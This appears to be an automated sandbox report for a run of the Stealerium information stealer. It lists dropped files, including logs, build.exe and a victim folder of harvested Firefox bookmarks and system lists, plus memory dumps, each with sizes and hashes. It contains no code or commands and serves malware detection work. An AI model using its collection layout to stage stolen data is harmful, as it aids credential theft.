C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
7KB

MD5
cbef857b15f93b4936c945703c5ebd6c

SHA1
128eb2ddc25cc5952b37d88044e8a55821bd7d91

SHA256
5306a2a2c22df65f0df7d71badc7d3bd87c41bbea454fb48319cb35f0a8fbe0d

SHA512
c4d96011339ce29eccd75ac7b2d4ae2eba57aa42380bc9694fba0f814df3758f2a01f8765dca1a6fffa44f8fe3ae3fce11140937a7f1f6d1d22666d7c869a585

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
7KB

MD5
2d3f9d0f7ef96a1d83ae7513ba4a13de

SHA1
b10208e75c1aba52c87c4c72069721a42b9966ad

SHA256
562dd9f2773c709c49cb8d7b2c978a63f5c91b36f3ffdf39bd3138bbca00ad62

SHA512
b2a4738e2ca3f308412f9da3643f3d2e952b97d384e1669913e21c0e02cfff68006d0f148b30cae889915d1aab09d7dbbf1bee1ebc4d631f08fefed60f4516e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
7KB

MD5
0169bd05f88b6e1977642172a9c42324

SHA1
194e636349ce720934279d41ce009c3e16f978ac

SHA256
0b9dd9fec48fb470172b9296910135884af7c8da43ad4d464096474c108b4797

SHA512
32e912506fa42a322f56c988ed688bc2565c8caf3f39106a043cb62ae0c122ac28d6adb74ac9e55fc36444fcb153826d54fbd039599de9cdb91c46b9a4e6e21a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
7KB

MD5
08a426f3452a329f39e14c9f2e02c5cc

SHA1
9f125446532c235d653d9e7a17ce0a8af53b62b5

SHA256
340ac60c2bdaf03ddb610b5b4bc9865255da3ae263619069f159a649c979b8fa

SHA512
de28df86e99bc13abc43696c6e4537b086bc8d984b5df02e88a3be2ae80a37fd16beb5133cdc36efc30761b445f83e96cd0b451ef23b104bdb8d7c2ae111486c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
8KB

MD5
2efe0cb529469ebbdaa3d75b86797d15

SHA1
6ef92b763e1d5417302106e760a6660839c6dd4c

SHA256
783be3003642c3e03f8242a5557d404c7f8c0206aac79fc2f1deddaafc5f4b69

SHA512
a01637f1fe9d28a536b2efde7f7244746eeefaae645263a24377182ab882876ada18ca982874bedc5b839c51cb3613d1edccef5898b211d9bbc183d80820f0e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
8KB

MD5
c97994fbb55ab500ca59087cddcf824e

SHA1
6cdb6869dd6a72f5450d7a527065e4a82942de2f

SHA256
a19ba24f23b1295210e6de31c1fff7e029842bc24560419e37db6931978a54fb

SHA512
e6d6259a8c96fcb37451cb54a3b6e82ded11f46ef557d8187cab72552731c9c81f6565712c782834605122bb8d6726d9fbbf2cfbb37f6a6758198b0af43e2d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
8KB

MD5
4072474116ff85293219f15e2e3dc772

SHA1
034f36a1e05f7e41a89e86d294f8f2e35d1cee53

SHA256
ccfdb40a2806945868c8096bf8fe2f5a84546624bee45766f3b704175efd94a1

SHA512
0bf1433b536efe70bb6b07814b32b8b11d88620dd5f258d1cecbc494c3edf836024a474dcd8c0a15e0f87d7dcdc69516712b9ccbe075dcc06ed2881bdb67333d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
8KB

MD5
37e39aae0d35031cb8d230ec69b764ff

SHA1
1ca4003d0d8882b966c187c4611660d8ddaf1234

SHA256
b0ad54834088a00b7886b666b0276d6fa3314c88b130cdbbe8e385f0751fe8c9

SHA512
48cc86c23163a296bb57620e40e5c23dff631770d02fd0a64d457cf1a1270ab0096961b92ee610333efa264fbb61f0b86ccdf1c6f64ee48546d532a23ba1ecaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
974B

MD5
32de6c0b0cd4c4405b66203ff1892db3

SHA1
697ee55fb5403906e0542bdbbaa54b27e71b5c19

SHA256
95f9fb31945f8888b20a8ca1d9aae8e458531d4318610861c81e878943fda3a4

SHA512
fa209f924a1d9000ae38da2502c2cf55c58bed5b49c7f78b9a277733d92785d6b5c22e396f44874b8d47f58bec2d033deef39cbeb9005e6236d933b303c6923f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikmkvfq.azo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\build.exe

Filesize
6.1MB

MD5
5abc4b2b91501f14bd9296f80d20539c

SHA1
b6c26f07cecb8d51e0d41808bb951ee399396a71

SHA256
600a124a4277f1d7e1e645ec63dee9c17ce30bb0b417a96d7875a6dfe903ffdf

SHA512
2f9535e4cbcb88b3d5b25632e20be1511b139acd5e89a227c8c61cb5750b2a99a6aacf6e4b584a5ff5a89f30991625f4441b833da0929d8d2eb514e730024b42

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\Browsers\Firefox\Bookmarks.txt

Filesize
220B

MD5
2ab1fd921b6c195114e506007ba9fe05

SHA1
90033c6ee56461ca959482c9692cf6cfb6c5c6af

SHA256
c79cfdd6d0757eb52fbb021e7f0da1a2a8f1dd81dcd3a4e62239778545a09ecc

SHA512
4f0570d7c7762ecb4dcf3171ae67da3c56aa044419695e5a05f318e550f1a910a616f5691b15abfe831b654718ec97a534914bd172aa7a963609ebd8e1fae0a5

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Apps.txt

Filesize
6KB

MD5
ab36bf1eed5791c6c41dfd04363a2f35

SHA1
c19a3adc7e409145fdb70d18e9f64f0fa5a9f9c9

SHA256
1ebd8cec0de554a9f995cf338c1453b3b485fbf4dccfe39694035fdf1723bbe6

SHA512
dbc5e201d74d82073d161ceddb0e206e428b3cc7d40fbb95ecdfd3bbfb76e6fc6001bc5c37c906ddd5df95b1c31eca675ec745b717df25859e8a5232a64b63d8

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
462B

MD5
cd371138c03a185eac4580dc9ef57499

SHA1
127ef1583e89e8aa98d0bffad0006c5fd0d5cff9

SHA256
e6d61efbe6142de7fd22a0ec65da575a01a14362608b7800bcbe73d6f65456b5

SHA512
3a1294933bac27055f381f777836629dc93b9405176cded81c2c33447d3725ecab16ef88f4298ea17b7215908ea896420826271453cd1433e0c18c9dffb50ded

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
1KB

MD5
2ec5953402dcfd5d87800424a98fc906

SHA1
caed0a8bf9b1b4129ae82ac82ba08a7d4d8d4c4b

SHA256
6b06fb02084e441f5045b5fee46a65fcb4a7fd89a4882ceab7da942d6fdc6b6c

SHA512
4c24eb5d282cb30b8499bd3b27d87915f6edc9c59bbf697930ce99a56679f8e560433cd58bed67b8326ee30ba1847f88efaacb230bd0028877c8cf4c071aedbd

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
1KB

MD5
fb922f3ed6ae6eb23992a4b5424e8ec5

SHA1
02c025475dfaa4e58afc473c7374fe4b7749c84e

SHA256
59855a404a6abdae8da62521f88109693d23c9ca1df1f140be64546e6f5e7c11

SHA512
66cc96235615fedc9100be3a97dfab953b7af64ad7ed942c3803f22c4abddf5b3e0d645495831ef6c9a8440bbaf9f66feebdaa59eb9ea011d854721a9691a22e

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
2KB

MD5
9fb25e2aee529ae0a46c3f9a0cf29a1c

SHA1
0b0ab27cfafbc180898c599eb551b4ccadecb4fc

SHA256
583838760bca4b02fe16df2bbb23b0038bfe237d3db91e64694905fa3098c83f

SHA512
6f6eea0f08c689012bd3bdca3652923cd08fa03b1250c4beee7d14e595bdd12cf2b0edbbc8cd3e7c8d94cb1711c34c0804922097bc1dc00f7094c0ea5469bc84

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
2KB

MD5
2cf682d49f375b5127f81c385c53df0f

SHA1
e9647f50c0a9175a35b935785d7499ae4c6ac8f9

SHA256
8d609aa7a63165c64243eb30525cd26079e76afa56d974c4498c6bdde4e248b5

SHA512
b1f40833d6899d6c145ab7653d29736ce0910d8c03fc61aab22319df82952d14a72d58811f6233147db6bd184bab477f24d8420c9de56e9f43ce3300bd8b0a00

Download Submit
C:\Users\Admin\AppData\Local\beb923820ca60db1f1a4dff8b55ee29f\Admin@NRDNEFMB_en-US\System\Process.txt

Filesize
4KB

MD5
783ea5c1e258ff6d0c4f3dda91be5bfc

SHA1
2131af3c58e3a34aea017177fdb5d449b8030624

SHA256
18cbc17d344afa4e76d76e5f3874a2db7cf594b9db187aacaf7a512064774cd3

SHA512
1d7857a0f336a1dd4504d2d1d4393e9456ee4454621d0944a6a1d6f9e957b3d2edfe5bd0f38675538f90b87fdeae2521cf42fa38be89867351be8a06b0eb30a3

Download Submit
memory/448-238-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/464-154-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/640-1054-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1050-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1049-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1045-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1051-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1052-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1053-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1055-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1044-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/640-1043-0x0000020C66AF0000-0x0000020C66AF1000-memory.dmp

Filesize
4KB

Download
memory/1452-447-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/1568-16-0x0000023D078D0000-0x0000023D07EE8000-memory.dmp

Filesize
6.1MB

Download
memory/2236-416-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/2248-934-0x00000170D02B0000-0x00000170D02D6000-memory.dmp

Filesize
152KB

Download
memory/2248-939-0x00000170D1960000-0x00000170D1968000-memory.dmp

Filesize
32KB

Download
memory/2248-930-0x00000170D18A0000-0x00000170D1940000-memory.dmp

Filesize
640KB

Download
memory/2248-493-0x00000170D1470000-0x00000170D1492000-memory.dmp

Filesize
136KB

Download
memory/2248-935-0x00000170D1450000-0x00000170D1458000-memory.dmp

Filesize
32KB

Download
memory/2248-933-0x00000170B7420000-0x00000170B742A000-memory.dmp

Filesize
40KB

Download
memory/2248-936-0x00000170D1940000-0x00000170D1956000-memory.dmp

Filesize
88KB

Download
memory/2248-937-0x00000170D1440000-0x00000170D144A000-memory.dmp

Filesize
40KB

Download
memory/2248-354-0x00000170CFCF0000-0x00000170CFDA2000-memory.dmp

Filesize
712KB

Download
memory/2248-938-0x00000170D02A0000-0x00000170D02AA000-memory.dmp

Filesize
40KB

Download
memory/2356-251-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/2836-204-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/3648-361-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/4004-79-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/4100-290-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/4208-309-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/4676-31-0x00000000066F0000-0x000000000673C000-memory.dmp

Filesize
304KB

Download
memory/4676-4-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/4676-3-0x00000000733A0000-0x0000000073B50000-memory.dmp

Filesize
7.7MB

Download
memory/4676-627-0x00000000733A0000-0x0000000073B50000-memory.dmp

Filesize
7.7MB

Download
memory/4676-1-0x00000000050B0000-0x00000000050E6000-memory.dmp

Filesize
216KB

Download
memory/4676-14-0x00000000733A0000-0x0000000073B50000-memory.dmp

Filesize
7.7MB

Download
memory/4676-164-0x0000000007C90000-0x0000000007C98000-memory.dmp

Filesize
32KB

Download
memory/4676-17-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/4676-19-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/4676-261-0x00000000733A0000-0x0000000073B50000-memory.dmp

Filesize
7.7MB

Download
memory/4676-219-0x00000000733AE000-0x00000000733AF000-memory.dmp

Filesize
4KB

Download
memory/4676-220-0x00000000733A0000-0x0000000073B50000-memory.dmp

Filesize
7.7MB

Download
memory/4676-153-0x0000000007CB0000-0x0000000007CCA000-memory.dmp

Filesize
104KB

Download
memory/4676-149-0x0000000007BC0000-0x0000000007BD4000-memory.dmp

Filesize
80KB

Download
memory/4676-145-0x0000000007BB0000-0x0000000007BBE000-memory.dmp

Filesize
56KB

Download
memory/4676-0-0x00000000733AE000-0x00000000733AF000-memory.dmp

Filesize
4KB

Download
memory/4676-105-0x0000000007B70000-0x0000000007B81000-memory.dmp

Filesize
68KB

Download
memory/4676-98-0x0000000007BF0000-0x0000000007C86000-memory.dmp

Filesize
600KB

Download
memory/4676-89-0x00000000079F0000-0x00000000079FA000-memory.dmp

Filesize
40KB

Download
memory/4676-75-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/4676-76-0x0000000007970000-0x000000000798A000-memory.dmp

Filesize
104KB

Download
memory/4676-54-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

Filesize
304KB

Download
memory/4676-65-0x0000000007840000-0x00000000078E3000-memory.dmp

Filesize
652KB

Download
memory/4676-64-0x0000000006C50000-0x0000000006C6E000-memory.dmp

Filesize
120KB

Download
memory/4676-53-0x0000000006C10000-0x0000000006C42000-memory.dmp

Filesize
200KB

Download
memory/4676-30-0x0000000006640000-0x000000000665E000-memory.dmp

Filesize
120KB

Download
memory/4676-18-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/4676-29-0x0000000006030000-0x0000000006384000-memory.dmp

Filesize
3.3MB

Download